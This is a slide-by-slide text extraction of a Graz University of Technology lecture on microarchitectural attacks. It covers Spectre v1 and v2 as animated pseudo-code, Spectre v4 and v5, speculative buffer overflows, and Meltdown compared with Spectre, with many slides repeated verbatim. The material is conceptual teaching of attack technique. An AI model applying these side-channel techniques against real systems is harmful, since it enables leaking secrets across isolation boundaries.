![Page 259: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/259.jpg)
L1TF/Foreshadow Demo
![Page 260: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/260.jpg)
Spectre v1 www.tugraz.at
index = 0;
if (index < 4)
char* data = "textKEY";
LUT[data[index] * 4096] 0
then
else
Prediction
Spectre v4: Ignore sanitizing write access and use unsanitized old value instead
60 Daniel Gruss — Graz University of Technology
![Page 261: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/261.jpg)
Spectre v1 www.tugraz.at
index = 0;
if (index < 4)
char* data = "textKEY";
LUT[data[index] * 4096] 0
then
else
Prediction
Spectre v4: Ignore sanitizing write access and use unsanitized old value instead
60 Daniel Gruss — Graz University of Technology
![Page 262: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/262.jpg)
Spectre v1 www.tugraz.at
Speculate
index = 0;
if (index < 4)
char* data = "textKEY";
LUT[data[index] * 4096] 0
then
else
Prediction
Spectre v4: Ignore sanitizing write access and use unsanitized old value instead
60 Daniel Gruss — Graz University of Technology
![Page 263: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/263.jpg)
Spectre v1 www.tugraz.at
Execute
index = 0;
if (index < 4)
char* data = "textKEY";
LUT[data[index] * 4096] 0
then
else
Prediction
Spectre v4: Ignore sanitizing write access and use unsanitized old value instead
60 Daniel Gruss — Graz University of Technology
![Page 264: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/264.jpg)
Spectre v1 www.tugraz.at
index = 1;
if (index < 4)
char* data = "textKEY";
LUT[data[index] * 4096] 0
then
else
Prediction
Spectre v4: Ignore sanitizing write access and use unsanitized old value instead
60 Daniel Gruss — Graz University of Technology
![Page 265: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/265.jpg)
Spectre v1 www.tugraz.at
index = 1;
if (index < 4)
char* data = "textKEY";
LUT[data[index] * 4096] 0
then
else
Prediction
Spectre v4: Ignore sanitizing write access and use unsanitized old value instead
60 Daniel Gruss — Graz University of Technology
![Page 266: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/266.jpg)
Spectre v1 www.tugraz.at
Speculate
index = 1;
if (index < 4)
char* data = "textKEY";
LUT[data[index] * 4096] 0
then
else
Prediction
Spectre v4: Ignore sanitizing write access and use unsanitized old value instead
60 Daniel Gruss — Graz University of Technology
![Page 267: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/267.jpg)
Spectre v1 www.tugraz.at
index = 1;
if (index < 4)
char* data = "textKEY";
LUT[data[index] * 4096] 0
then
else
Prediction
Spectre v4: Ignore sanitizing write access and use unsanitized old value instead
60 Daniel Gruss — Graz University of Technology
![Page 268: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/268.jpg)
Spectre v1 www.tugraz.at
index = 2;
if (index < 4)
char* data = "textKEY";
LUT[data[index] * 4096] 0
then
else
Prediction
Spectre v4: Ignore sanitizing write access and use unsanitized old value instead
60 Daniel Gruss — Graz University of Technology
![Page 269: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/269.jpg)
Spectre v1 www.tugraz.at
index = 2;
if (index < 4)
char* data = "textKEY";
LUT[data[index] * 4096] 0
then
else
Prediction
Spectre v4: Ignore sanitizing write access and use unsanitized old value instead
60 Daniel Gruss — Graz University of Technology
![Page 270: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/270.jpg)
Spectre v1 www.tugraz.at
Speculate
index = 2;
if (index < 4)
char* data = "textKEY";
LUT[data[index] * 4096] 0
then
else
Prediction
Spectre v4: Ignore sanitizing write access and use unsanitized old value instead
60 Daniel Gruss — Graz University of Technology
![Page 271: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/271.jpg)
Spectre v1 www.tugraz.at
index = 2;
if (index < 4)
char* data = "textKEY";
LUT[data[index] * 4096] 0
then
else
Prediction
Spectre v4: Ignore sanitizing write access and use unsanitized old value instead
60 Daniel Gruss — Graz University of Technology
![Page 272: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/272.jpg)
Spectre v1 www.tugraz.at
index = 3;
if (index < 4)
char* data = "textKEY";
LUT[data[index] * 4096] 0
then
else
Prediction
Spectre v4: Ignore sanitizing write access and use unsanitized old value instead
60 Daniel Gruss — Graz University of Technology
![Page 273: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/273.jpg)
Spectre v1 www.tugraz.at
index = 3;
if (index < 4)
char* data = "textKEY";
LUT[data[index] * 4096] 0
then
else
Prediction
Spectre v4: Ignore sanitizing write access and use unsanitized old value instead
60 Daniel Gruss — Graz University of Technology
![Page 274: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/274.jpg)
Spectre v1 www.tugraz.at
Speculate
index = 3;
if (index < 4)
char* data = "textKEY";
LUT[data[index] * 4096] 0
then
else
Prediction
Spectre v4: Ignore sanitizing write access and use unsanitized old value instead
60 Daniel Gruss — Graz University of Technology
![Page 275: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/275.jpg)
Spectre v1 www.tugraz.at
index = 3;
if (index < 4)
char* data = "textKEY";
LUT[data[index] * 4096] 0
then
else
Prediction
Spectre v4: Ignore sanitizing write access and use unsanitized old value instead
60 Daniel Gruss — Graz University of Technology
![Page 276: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/276.jpg)
Spectre v1 www.tugraz.at
index = 4;
if (index < 4)
char* data = "textKEY";
LUT[data[index] * 4096] 0
then
else
Prediction
Spectre v4: Ignore sanitizing write access and use unsanitized old value instead
60 Daniel Gruss — Graz University of Technology
![Page 277: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/277.jpg)
Spectre v1 www.tugraz.at
index = 4;
if (index < 4)
char* data = "textKEY";
LUT[data[index] * 4096] 0
then
else
Prediction
Spectre v4: Ignore sanitizing write access and use unsanitized old value instead
60 Daniel Gruss — Graz University of Technology
![Page 278: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/278.jpg)
Spectre v1 www.tugraz.at
Speculate
index = 4;
if (index < 4)
char* data = "textKEY";
LUT[data[index] * 4096] 0
then
else
Prediction
Spectre v4: Ignore sanitizing write access and use unsanitized old value instead
60 Daniel Gruss — Graz University of Technology
![Page 279: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/279.jpg)
Spectre v1 www.tugraz.at
Execute
index = 4;
if (index < 4)
char* data = "textKEY";
LUT[data[index] * 4096] 0
then
else
Prediction
Spectre v4: Ignore sanitizing write access and use unsanitized old value instead
60 Daniel Gruss — Graz University of Technology
![Page 280: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/280.jpg)
Spectre v1 www.tugraz.at
index = 5;
if (index < 4)
char* data = "textKEY";
LUT[data[index] * 4096] 0
then
else
Prediction
Spectre v4: Ignore sanitizing write access and use unsanitized old value instead
60 Daniel Gruss — Graz University of Technology
![Page 281: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/281.jpg)
Spectre v1 www.tugraz.at
index = 5;
if (index < 4)
char* data = "textKEY";
LUT[data[index] * 4096] 0
then
else
Prediction
Spectre v4: Ignore sanitizing write access and use unsanitized old value instead
60 Daniel Gruss — Graz University of Technology
![Page 282: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/282.jpg)
Spectre v1 www.tugraz.at
Speculate
index = 5;
if (index < 4)
char* data = "textKEY";
LUT[data[index] * 4096] 0
then
else
Prediction
Spectre v4: Ignore sanitizing write access and use unsanitized old value instead
60 Daniel Gruss — Graz University of Technology
![Page 283: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/283.jpg)
Spectre v1 www.tugraz.at
Execute
index = 5;
if (index < 4)
char* data = "textKEY";
LUT[data[index] * 4096] 0
then
else
Prediction
Spectre v4: Ignore sanitizing write access and use unsanitized old value instead
60 Daniel Gruss — Graz University of Technology
![Page 284: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/284.jpg)
Spectre v1 www.tugraz.at
index = 6;
if (index < 4)
char* data = "textKEY";
LUT[data[index] * 4096] 0
then
else
Prediction
Spectre v4: Ignore sanitizing write access and use unsanitized old value instead
60 Daniel Gruss — Graz University of Technology
![Page 285: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/285.jpg)
Spectre v1 www.tugraz.at
index = 6;
if (index < 4)
char* data = "textKEY";
LUT[data[index] * 4096] 0
then
else
Prediction
Spectre v4: Ignore sanitizing write access and use unsanitized old value instead
60 Daniel Gruss — Graz University of Technology
![Page 286: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/286.jpg)
Spectre v1 www.tugraz.at
Speculate
index = 6;
if (index < 4)
char* data = "textKEY";
LUT[data[index] * 4096] 0
then
else
Prediction
Spectre v4: Ignore sanitizing write access and use unsanitized old value instead
60 Daniel Gruss — Graz University of Technology
![Page 287: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/287.jpg)
Spectre v1 www.tugraz.at
Execute
index = 6;
if (index < 4)
char* data = "textKEY";
LUT[data[index] * 4096] 0
then
else
Prediction
Spectre v4: Ignore sanitizing write access and use unsanitized old value instead
60 Daniel Gruss — Graz University of Technology
![Page 288: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/288.jpg)
Spectre v1 www.tugraz.at
Execute
index = 6;
if (index < 4)
char* data = "textKEY";
LUT[data[index] * 4096] 0
then
else
Prediction
Spectre v4: Ignore sanitizing write access and use unsanitized old value instead
60 Daniel Gruss — Graz University of Technology
![Page 289: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/289.jpg)
Spectre v2 www.tugraz.at
a->move()
Animal* a = bird;
LUT[data[a->m] * 4096] 0
fly()
Prediction
swim()swim
()
Spectre v2: mistrain BTB → mispredict indirect jump/call
Spectre v5: mistrain RSB → mispredict return
61 Daniel Gruss — Graz University of Technology
![Page 290: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/290.jpg)
Spectre v2 www.tugraz.at
Speculate
a->move()
Animal* a = bird;
LUT[data[a->m] * 4096] 0
fly()
Prediction
swim()swim
()
Spectre v2: mistrain BTB → mispredict indirect jump/call
Spectre v5: mistrain RSB → mispredict return
61 Daniel Gruss — Graz University of Technology
![Page 291: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/291.jpg)
Spectre v2 www.tugraz.at
a->move()
Animal* a = bird;
LUT[data[a->m] * 4096] 0
fly()
Prediction
swim()swim
()
Spectre v2: mistrain BTB → mispredict indirect jump/call
Spectre v5: mistrain RSB → mispredict return
61 Daniel Gruss — Graz University of Technology
![Page 292: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/292.jpg)
Spectre v2 www.tugraz.at
Execute
a->move()
Animal* a = bird;
LUT[data[a->m] * 4096] 0
fly()
Prediction
swim()swim
()
Spectre v2: mistrain BTB → mispredict indirect jump/call
Spectre v5: mistrain RSB → mispredict return
61 Daniel Gruss — Graz University of Technology
![Page 293: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/293.jpg)
Spectre v2 www.tugraz.at
a->move()
Animal* a = bird;
LUT[data[a->m] * 4096] 0
fly()
Prediction
fly()swim
()
Spectre v2: mistrain BTB → mispredict indirect jump/call
Spectre v5: mistrain RSB → mispredict return
61 Daniel Gruss — Graz University of Technology
![Page 294: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/294.jpg)
Spectre v2 www.tugraz.at
Speculate
a->move()
Animal* a = bird;
LUT[data[a->m] * 4096] 0
fly()
Prediction
fly()swim
()
Spectre v2: mistrain BTB → mispredict indirect jump/call
Spectre v5: mistrain RSB → mispredict return
61 Daniel Gruss — Graz University of Technology
![Page 295: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/295.jpg)
Spectre v2 www.tugraz.at
a->move()
Animal* a = bird;
LUT[data[a->m] * 4096] 0
fly()
Prediction
fly()swim
()
Spectre v2: mistrain BTB → mispredict indirect jump/call
Spectre v5: mistrain RSB → mispredict return
61 Daniel Gruss — Graz University of Technology
![Page 296: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/296.jpg)
Spectre v2 www.tugraz.at
a->move()
Animal* a = fish;
LUT[data[a->m] * 4096] 0
fly()
Prediction
fly()swim
()
Spectre v2: mistrain BTB → mispredict indirect jump/call
Spectre v5: mistrain RSB → mispredict return
61 Daniel Gruss — Graz University of Technology
![Page 297: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/297.jpg)
Spectre v2 www.tugraz.at
Speculate
a->move()
Animal* a = fish;
LUT[data[a->m] * 4096] 0
fly()
Prediction
fly()swim
()
Spectre v2: mistrain BTB → mispredict indirect jump/call
Spectre v5: mistrain RSB → mispredict return
61 Daniel Gruss — Graz University of Technology
![Page 298: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/298.jpg)
Spectre v2 www.tugraz.at
a->move()
Animal* a = fish;
LUT[data[a->m] * 4096] 0
fly()
Prediction
fly()swim
()
Spectre v2: mistrain BTB → mispredict indirect jump/call
Spectre v5: mistrain RSB → mispredict return
61 Daniel Gruss — Graz University of Technology
![Page 299: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/299.jpg)
Spectre v2 www.tugraz.at
Execute
a->move()
Animal* a = fish;
LUT[data[a->m] * 4096] 0
fly()
Prediction
fly()
swim()
Spectre v2: mistrain BTB → mispredict indirect jump/call
Spectre v5: mistrain RSB → mispredict return
61 Daniel Gruss — Graz University of Technology
![Page 300: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/300.jpg)
Spectre v2 www.tugraz.at
a->move()
Animal* a = fish;
LUT[data[a->m] * 4096] 0
fly()
Prediction
swim()swim
()
Spectre v2: mistrain BTB → mispredict indirect jump/call
Spectre v5: mistrain RSB → mispredict return
61 Daniel Gruss — Graz University of Technology
![Page 301: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/301.jpg)
Spectre v2 www.tugraz.at
a->move()
Animal* a = fish;
LUT[data[a->m] * 4096] 0
fly()
Prediction
swim()swim
()
Spectre v2: mistrain BTB → mispredict indirect jump/call
Spectre v5: mistrain RSB → mispredict return
61 Daniel Gruss — Graz University of Technology
![Page 302: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/302.jpg)
Spectre v2 www.tugraz.at
a->move()
Animal* a = fish;
LUT[data[a->m] * 4096] 0
fly()
Prediction
swim()swim
()
Spectre v2: mistrain BTB → mispredict indirect jump/call
Spectre v5: mistrain RSB → mispredict return
61 Daniel Gruss — Graz University of Technology
![Page 303: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/303.jpg)
“Speculative Buffer Overflows”7 www.tugraz.at
• v1.1: Speculatively write to memory locations
→ Many more gadgets than previously anticipated n
• v1.2: Ignore writable bit
→ not really Spectre but a Meltdown variant
7Vladimir Kiriansky et al. Speculative Buffer Overflows: Attacks and Defenses. In: arXiv:1807.03757
(2018).
62 Daniel Gruss — Graz University of Technology
![Page 304: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/304.jpg)
“Speculative Buffer Overflows”7 www.tugraz.at
• v1.1: Speculatively write to memory locations
→ Many more gadgets than previously anticipated n
• v1.2: Ignore writable bit
→ not really Spectre but a Meltdown variant
7Vladimir Kiriansky et al. Speculative Buffer Overflows: Attacks and Defenses. In: arXiv:1807.03757
(2018).
62 Daniel Gruss — Graz University of Technology
![Page 305: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/305.jpg)
“Speculative Buffer Overflows”7 www.tugraz.at
• v1.1: Speculatively write to memory locations
→ Many more gadgets than previously anticipated n
• v1.2: Ignore writable bit
→ not really Spectre but a Meltdown variant
7Vladimir Kiriansky et al. Speculative Buffer Overflows: Attacks and Defenses. In: arXiv:1807.03757
(2018).
62 Daniel Gruss — Graz University of Technology
![Page 306: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/306.jpg)
“Speculative Buffer Overflows”7 www.tugraz.at
• v1.1: Speculatively write to memory locations
→ Many more gadgets than previously anticipated n
• v1.2: Ignore writable bit
→ not really Spectre but a Meltdown variant
7Vladimir Kiriansky et al. Speculative Buffer Overflows: Attacks and Defenses. In: arXiv:1807.03757
(2018).
62 Daniel Gruss — Graz University of Technology
![Page 307: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/307.jpg)
Meltdown vs. Spectre www.tugraz.at
Meltdown attacks
• Meltdown, LazyFP (v3.1),
Foreshadow, Foreshadow-NG, ...
• Out-of-Order Execution
• no prediction required
→ melt down isolation by ignoring access
permissions (e.g., page table bits)
• practical mitigation in software (e.g.,
KAISER)
Spectre attacks
• v1, v1.1, v2, v4, SpectreRSB (v5)
• Speculative Execution ⊂Out-of-Order Execution
• fundamentally rely on prediction
• difficult to mitigate because it does
not violate access permissions
• ...
• ...
63 Daniel Gruss — Graz University of Technology
![Page 308: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/308.jpg)
Meltdown vs. Spectre www.tugraz.at
Meltdown attacks
• Meltdown, LazyFP (v3.1),
Foreshadow, Foreshadow-NG, ...
• Out-of-Order Execution
• no prediction required
→ melt down isolation by ignoring access
permissions (e.g., page table bits)
• practical mitigation in software (e.g.,
KAISER)
Spectre attacks
• v1, v1.1, v2, v4, SpectreRSB (v5)
• Speculative Execution ⊂Out-of-Order Execution
• fundamentally rely on prediction
• difficult to mitigate because it does
not violate access permissions
• ...
• ...
63 Daniel Gruss — Graz University of Technology
![Page 309: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/309.jpg)
Meltdown vs. Spectre www.tugraz.at
Meltdown attacks
• Meltdown, LazyFP (v3.1),
Foreshadow, Foreshadow-NG, ...
• Out-of-Order Execution
• no prediction required
→ melt down isolation by ignoring access
permissions (e.g., page table bits)
• practical mitigation in software (e.g.,
KAISER)
Spectre attacks
• v1, v1.1, v2, v4, SpectreRSB (v5)
• Speculative Execution ⊂Out-of-Order Execution
• fundamentally rely on prediction
• difficult to mitigate because it does
not violate access permissions
• ...
• ...
63 Daniel Gruss — Graz University of Technology
![Page 310: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/310.jpg)
Meltdown vs. Spectre www.tugraz.at
Meltdown attacks
• Meltdown, LazyFP (v3.1),
Foreshadow, Foreshadow-NG, ...
• Out-of-Order Execution
• no prediction required
→ melt down isolation by ignoring access
permissions (e.g., page table bits)
• practical mitigation in software (e.g.,
KAISER)
Spectre attacks
• v1, v1.1, v2, v4, SpectreRSB (v5)
• Speculative Execution ⊂Out-of-Order Execution
• fundamentally rely on prediction
• difficult to mitigate because it does
not violate access permissions
• ...
• ...
63 Daniel Gruss — Graz University of Technology
![Page 311: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/311.jpg)
Meltdown vs. Spectre www.tugraz.at
Meltdown attacks
• Meltdown, LazyFP (v3.1),
Foreshadow, Foreshadow-NG, ...
• Out-of-Order Execution
• no prediction required
→ melt down isolation by ignoring access
permissions (e.g., page table bits)
• practical mitigation in software (e.g.,
KAISER)
Spectre attacks
• v1, v1.1, v2, v4, SpectreRSB (v5)
• Speculative Execution ⊂Out-of-Order Execution
• fundamentally rely on prediction
• difficult to mitigate because it does
not violate access permissions
• ...
• ...
63 Daniel Gruss — Graz University of Technology
![Page 312: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/312.jpg)
Meltdown vs. Spectre www.tugraz.at
Meltdown attacks
• Meltdown, LazyFP (v3.1),
Foreshadow, Foreshadow-NG, ...
• Out-of-Order Execution
• no prediction required
→ melt down isolation by ignoring access
permissions (e.g., page table bits)
• practical mitigation in software (e.g.,
KAISER)
Spectre attacks
• v1, v1.1, v2, v4, SpectreRSB (v5)
• Speculative Execution ⊂Out-of-Order Execution
• fundamentally rely on prediction
• difficult to mitigate because it does
not violate access permissions
• ...
• ...
63 Daniel Gruss — Graz University of Technology
![Page 313: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/313.jpg)
Conclusion www.tugraz.at
• large-scale attacks due to different threat model
• overlap could be leveraged to gain more complete picture
• space for promising mitigations (due to inherent restrictions for
the attacker)
64 Daniel Gruss — Graz University of Technology
